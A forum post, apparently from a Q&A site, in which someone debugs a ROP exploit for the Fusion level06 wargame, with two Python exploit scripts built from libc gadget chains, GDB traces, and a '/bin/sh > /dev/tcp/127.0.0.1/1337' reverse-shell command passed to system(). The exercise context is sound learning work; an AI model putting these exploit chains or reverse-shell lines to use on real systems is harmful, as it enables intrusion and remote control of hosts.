c - Exploit exercise Fusion level06, system command not opening reverse shell?
Problem description
I am trying to exploit exercise level06, and now I am really confused.
My exploit script successfully leaks the correct libc address. It even calls the __libc_system command with the correct argument, but still nothing happens.
Breakpoint in the __libc_system function
Breakpoint 4, __libc_system (line=0xb7718100 "/bin/sh > /dev/tcp/127.0.0.1/1337 0>&1 2>&1 ")
at ../sysdeps/posix/system.c:179
179 ../sysdeps/posix/system.c: No such file or directory.
in ../sysdeps/posix/system.c
So, according to the gdb output above, my exploit is calling __libc_system and passing the right argument. But nothing. (Note: the thread does not exit or die either. Nothing, it just waits.)
A piece of payload code
import re
import struct
from struct import pack

def writethroughpayload(libc, base, data):
    # Split the string into 4-byte chunks and store each chunk at base + 4*n
    # through a mov %eax,(%ecx) gadget (write-what-where via ROP)
    data = re.findall('....', data)
    gt = libc + 0x000e0097 # pop %ecx | pop %ebx | ret
    gt2 = libc + 0x000238df # pop %eax | ret
    gt3 = libc + 0x0006cc5a # mov %eax,(%ecx) | ret
    p = ''
    for n, i in enumerate(data):
        print '[+] Number {} Data {}'.format(n*4, i)
        p += pack("<I", gt) # pop %ecx | pop %ebx | ret
        p += pack("<I", base+(n*4)) # @ .data + 4
        p += pack("<I", 0x42424242) # padding
        p += pack("<I", gt2) # pop %eax | ret
        p += i
        p += pack("<I", gt3) # mov %eax,(%ecx) | ret
        p += pack("<I", libc + 0x000328e0) # xor %eax,%eax | ret
    return p

# Open bind shell : port 1337
def openncshell(libcbase):
    data = 0x176000 + 0x2000 + 0x1000 + 0x100
    # Because of some error, here I am printing every single payload byte
    # CMD is the command string defined elsewhere in the script
    p = writethroughpayload(libcbase, libcbase+data, CMD)
    p += pack("<I", libcbase + 0x000238df) # pop %eax | ret
    p += pack("<I", libcbase+data)
    p += pack("<I", libcbase + 0x0003cb20) # system()
    p += pack("<I", libcbase + 0x000329e0) # exit()
    p += pack("<I", libcbase + data)*3 # @ .data
    p += '\xcc'*12
    return p

def exploit(libc):
    # Payload
    # EIP = 60
    # EDI = 52
    # ESI = 48
    # EBP = 56
    # EBX = 44
    payload = 'N'*28 # Paddings
    payload += pack('I', libc+0x17600+0x3000+0x150)
    payload += 'N'*12
    payload += 'JJJJ' # EBX
    payload += 'KKKK' # ESI
    payload += 'LLLL' # EDI
    payload += 'MMMM' # EBP
    payload += pack("I", libc + 0x000e0097) # EIP = pop %ecx | pop %ebx | ret
    #payload += openncshell(libc) # EIP
    # Got Control Over
    # EAX = EAX -
    # EDX = 64 Offset
    # ESI = 64 Offset
    # mov eax,DWORD PTR [esi+0x55c]
    payload += struct.pack('I', (libc + 0x0003cb20)-0x55c) # 64 System
    payload += 'BBBB'
    payload += openncshell(libc)
    return payload
GDB output
(gdb) shell
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# /opt/fusion/bin/level06
root@fusion:~# netstat -p -l | grep level06
tcp 0 0 *:20006 *:* LISTEN 4608/level06
root@fusion:~# exit
exit
(gdb) attach 4608
Attaching to program: /opt/fusion/bin/level06, process 4608
Reading symbols from /usr/lib/libHX.so.27...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libHX.so.27
Reading symbols from /usr/lib/i386-linux-gnu/libgnutls.so.26...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/i386-linux-gnu/libgnutls.so.26
Reading symbols from /lib/i386-linux-gnu/libpthread.so.0...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libpthread-2.13.so...done.
[Thread debugging using libthread_db enabled]
done.
Loaded symbols for /lib/i386-linux-gnu/libpthread.so.0
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/i386-linux-gnu/libgcrypt.so.11...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgcrypt.so.11
Reading symbols from /lib/i386-linux-gnu/libdl.so.2...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libdl-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libdl.so.2
Reading symbols from /usr/lib/i386-linux-gnu/libtasn1.so.3...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/i386-linux-gnu/libtasn1.so.3
Reading symbols from /lib/i386-linux-gnu/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libz.so.1
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/i386-linux-gnu/libgpg-error.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgpg-error.so.0
eax 0xfffffe00 -512
ecx 0xbfd68200 -1076461056
edx 0xb78293bc -1216179268
ebx 0x5 5
esp 0xbfd681e8 0xbfd681e8
ebp 0xbfd68268 0xbfd68268
esi 0x0 0
edi 0xbfd68234 -1076461004
eip 0xb7804424 0xb7804424 <__kernel_vsyscall+16>
eflags 0x293 [ CF AF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb7804424 <__kernel_vsyscall+16>: pop ebp
0xb7804425 <__kernel_vsyscall+17>: pop edx
0xb7804426 <__kernel_vsyscall+18>: pop ecx
0xb7804427 <__kernel_vsyscall+19>: ret
0xb7804428: add BYTE PTR [esi],ch
0xb7804424 in __kernel_vsyscall ()
(gdb) b *__libc_system
Breakpoint 4 at 0xb75dbb20: file ../sysdeps/posix/system.c, line 179.
(gdb) c
Continuing.
[New Thread 0xb5ce3b70 (LWP 4629)]
[Switching to Thread 0xb5ce3b70 (LWP 4629)]
eax 0xb7718100 -1217298176
ecx 0xb7718128 -1217298136
edx 0xb75db5c4 -1218595388
ebx 0x42424242 1111638594
esp 0xb5ce325c 0xb5ce325c
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x4b4b4b4b 1263225675
edi 0x4c4c4c4c 1280068684
eip 0xb75dbb20 0xb75dbb20 <__libc_system>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb75dbb20 <__libc_system>: sub esp,0x10
0xb75dbb23 <__libc_system+3>: mov DWORD PTR [esp+0x8],esi
0xb75dbb27 <__libc_system+7>: mov esi,DWORD PTR [esp+0x14]
0xb75dbb2b <__libc_system+11>: mov DWORD PTR [esp+0x4],ebx
0xb75dbb2f <__libc_system+15>: call 0xb76acb63 <__i686.get_pc_thunk.bx>
Breakpoint 4, __libc_system (line=0xb7718100 "/bin/sh > /dev/tcp/127.0.0.1/1337 0>&1 2>&1 ")
at ../sysdeps/posix/system.c:179
179 ../sysdeps/posix/system.c: No such file or directory.
in ../sysdeps/posix/system.c
(gdb)
Continuing.
^C
Program received signal SIGINT, Interrupt.
[Switching to Thread 0xb74e7a70 (LWP 4608)]
eax 0xfffffe00 -512
ecx 0xbfd68200 -1076461056
edx 0xb78293bc -1216179268
ebx 0x5 5
esp 0xbfd681e8 0xbfd681e8
ebp 0xbfd68268 0xbfd68268
esi 0x0 0
edi 0xbfd68234 -1076461004
eip 0xb7804424 0xb7804424 <__kernel_vsyscall+16>
eflags 0x293 [ CF AF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb7804424 <__kernel_vsyscall+16>: pop ebp
0xb7804425 <__kernel_vsyscall+17>: pop edx
0xb7804426 <__kernel_vsyscall+18>: pop ecx
0xb7804427 <__kernel_vsyscall+19>: ret
0xb7804428: add BYTE PTR [esi],ch
In this strange situation, after losing hope, I tried stepping through every single instruction and finally found this
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0f4 0xb2c7d0f4
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4415 0xb77a4415 <__kernel_vsyscall+1>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4415 <__kernel_vsyscall+1>: push edx
0xb77a4416 <__kernel_vsyscall+2>: push ebp
0xb77a4417 <__kernel_vsyscall+3>: mov ebp,esp
0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a4415 in __kernel_vsyscall ()
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0f0 0xb2c7d0f0
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4416 0xb77a4416 <__kernel_vsyscall+2>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4416 <__kernel_vsyscall+2>: push ebp
0xb77a4417 <__kernel_vsyscall+3>: mov ebp,esp
0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a441c <__kernel_vsyscall+8>: nop
0xb77a4416 in __kernel_vsyscall ()
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0ec 0xb2c7d0ec
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4417 0xb77a4417 <__kernel_vsyscall+3>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4417 <__kernel_vsyscall+3>: mov ebp,esp
0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a441c <__kernel_vsyscall+8>: nop
0xb77a441d <__kernel_vsyscall+9>: nop
0xb77a4417 in __kernel_vsyscall ()
(gdb)
eax 0xf0 240
ecx 0x80 128
edx 0x2 2
ebx 0xb76b8100 -1217691392
esp 0xb2c7d0ec 0xb2c7d0ec
ebp 0xb2c7d0ec 0xb2c7d0ec
esi 0x0 0
edi 0xb2c7d1a0 -1295527520
eip 0xb77a4419 0xb77a4419 <__kernel_vsyscall+5>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb77a4419 <__kernel_vsyscall+5>: sysenter
0xb77a441b <__kernel_vsyscall+7>: nop
0xb77a441c <__kernel_vsyscall+8>: nop
0xb77a441d <__kernel_vsyscall+9>: nop
0xb77a441e <__kernel_vsyscall+10>: nop
0xb77a4419 in __kernel_vsyscall ()
In short, the program gets stuck in the kernel syscall instruction.
Please check the Pastebin link provided below and scroll down to the end.
Another attempt.
Exploit
import re
from struct import pack

def writethroughpayload(libc, base, data):
    # Split the string into 4-byte chunks and store each chunk at base + 4*n
    # through a mov %eax,(%ecx) gadget, then write a zero dword right after it
    data = re.findall('....', data)
    gt = libc + 0x000e0097 # pop %ecx | pop %ebx | ret
    gt2 = libc + 0x000238df # pop %eax | ret
    gt3 = libc + 0x0006cc5a # mov %eax,(%ecx) | ret
    p = ''
    for n, i in enumerate(data):
        print '[+] Number {} Data {}'.format(n*4, i)
        p += pack("<I", gt) # pop %ecx | pop %ebx | ret
        p += pack("<I", base+(n*4)) # @ .data + 4
        p += pack("<I", 0x42424242) # padding
        p += pack("<I", gt2) # pop %eax | ret
        p += i
        p += pack("<I", gt3) # mov %eax,(%ecx) | ret
        p += pack("<I", libc + 0x000328e0) # xor %eax,%eax | ret
        p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
        p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
        p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
        p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
        p += pack("<I", libc + 0x0006cc5a) # mov %eax,(%ecx) | ret
    return p

# Open bind shell : port 1337
def openncshell(libcbase):
    data = 0x176000 + 0x2000 + 0x1000 + 20
    data2 = data + 0x50
    # Because of some error, here I am printing every single payload byte
    p = writethroughpayload(libcbase, libcbase+data, '/tmp/hackingworks ') # command
    p += writethroughpayload(libcbase, libcbase+data2, '/bin/touch ') # name
    # EBX = filename
    p += pack('<I', libcbase +0x00018f4e) # pop ebx ; ret
    p += pack('<I', libcbase +data2) #--> Filename
    # ECX = Argv EDX = NULL
    p += pack('<I', libcbase +0x2da2b) # pop ecx ; pop edx ; ret
    p += pack('<I', libcbase +data) # argv
    p += pack('<I', libcbase +data+20) # NULL
    # EAX = 11 + kernel call done
    p += pack('<I', libcbase +0x0002eb8f) # xor eax, eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    #p += '\xcc'*4
    p += pack('<I', libcbase +0x0002dd35) # int 0x80
    print '[+] Want To Check Syscall. Set breakpoint here : ', hex(libcbase +0x0002dd35)
    return p
More accurate GDB output
root@fusion:~# netstat -p -l | grep level06
tcp 0 0 *:20006 *:* LISTEN 3401/level06
root@fusion:~# exit
exit
(gdb) attach 3401
A program is being debugged already. Kill it? (y or n) y
--Skip--
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/i386-linux-gnu/libgpg-error.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgpg-error.so.0
eax 0xfffffe00 -512
ecx 0xbfdd9a50 -1075996080
edx 0xb778f3bc -1216810052
ebx 0x5 5
esp 0xbfdd9a38 0xbfdd9a38
ebp 0xbfdd9ab8 0xbfdd9ab8
esi 0x0 0
edi 0xbfdd9a84 -1075996028
eip 0xb776a424 0xb776a424 <__kernel_vsyscall+16>
eflags 0x293 [ CF AF SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb776a424 <__kernel_vsyscall+16>: pop ebp
0xb776a425 <__kernel_vsyscall+17>: pop edx
0xb776a426 <__kernel_vsyscall+18>: pop ecx
0xb776a427 <__kernel_vsyscall+19>: ret
0xb776a428: add BYTE PTR [esi],ch
0xb776a424 in __kernel_vsyscall ()
(gdb) b *0xb7532d35
Breakpoint 9 at 0xb7532d35
(gdb) c
Continuing.
[New Thread 0xb5c49b70 (LWP 3416)]
[Switching to Thread 0xb5c49b70 (LWP 3416)]
eax 0xb 11
ecx 0xb767e014 -1217929196
edx 0xb767e028 -1217929176
ebx 0xb767e064 -1217929116
esp 0xb5c49250 0xb5c49250
ebp 0x4d4d4d4d 0x4d4d4d4d
esi 0x4b4b4b4b 1263225675
edi 0x4c4c4c4c 1280068684
eip 0xb7532d35 0xb7532d35 <__restore_rt+5>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
=> 0xb7532d35 <__restore_rt+5>: int 0x80
0xb7532d37 <__restore_rt+7>: nop
0xb7532d38 <__restore>: pop eax
0xb7532d39 <__restore+1>: mov eax,0x77
0xb7532d3e <__restore+6>: int 0x80
Breakpoint 9, <signal handler called>
(gdb) si
Couldn't recognize signal trampoline.
(gdb) c
Continuing.
Cannot find user-level thread for LWP 3416: generic error
(gdb)